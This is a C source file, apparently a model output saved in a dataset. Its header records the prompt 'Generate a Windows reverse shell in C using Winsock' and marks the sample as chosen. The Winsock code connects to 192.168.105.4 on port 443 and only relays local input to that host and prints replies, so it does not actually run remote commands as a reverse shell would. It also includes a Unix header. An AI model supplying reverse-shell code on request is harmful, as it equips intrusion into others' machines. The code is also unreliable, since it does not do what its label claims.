/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-25 20:56:55
 * Prompt: Generate a Windows reverse shell in C using Winsock
 * Status: CHOSEN
 * Sample: 4
 * ============================================================
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <winsock2.h>

#define SERVER_IP "192.168.105.4" // Replace with the server's IP address
#define SERVER_PORT 443           // Replace with the desired port number

int main() {
    WSADATA wsaData;
    SOCKET clientSocket;
    struct sockaddr_in serverAddr;

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        perror("Failed to initialize winsock");
        return 1;
    }

    clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (clientSocket == INVALID_SOCKET) {
        perror("Failed to create socket");
        WSACleanup();
        return 1;
    }

    memset(&serverAddr, 0, sizeof(serverAddr));
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_addr.s_addr = inet_addr(SERVER_IP); // Use inet_addr for IPv4
    serverAddr.sin_port = htons(SERVER_PORT);

    if (connect(clientSocket, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) == SOCKET_ERROR) {
        perror("Connection failed");
        closesocket(clientSocket);
        WSACleanup();
        return 1;
    }

    printf("Connected to the server.\n");

    while (1) {
        char command[1024];
        memset(command, 0, sizeof(command));

        fgets(command, sizeof(command), stdin);
        strtok(command, "\n"); // Remove newline character

        if (send(clientSocket, command, strlen(command), 0) == SOCKET_ERROR) {
            perror("Send failed");
            break;
        } else {
            char buffer[1024];
            memset(buffer, 0, sizeof(buffer));

            int bytesRead = recv(clientSocket, buffer, sizeof(buffer) - 1, 0);
            if (bytesRead > 0) {
                printf("%s", buffer);
            } else if (bytesRead == 0) {
                printf("Connection closed by server\n");
                break;
            } else {
                perror("Receive failed");
                break;
            }
        }
    }

    closesocket(clientSocket);
    WSACleanup();

    return 0;
}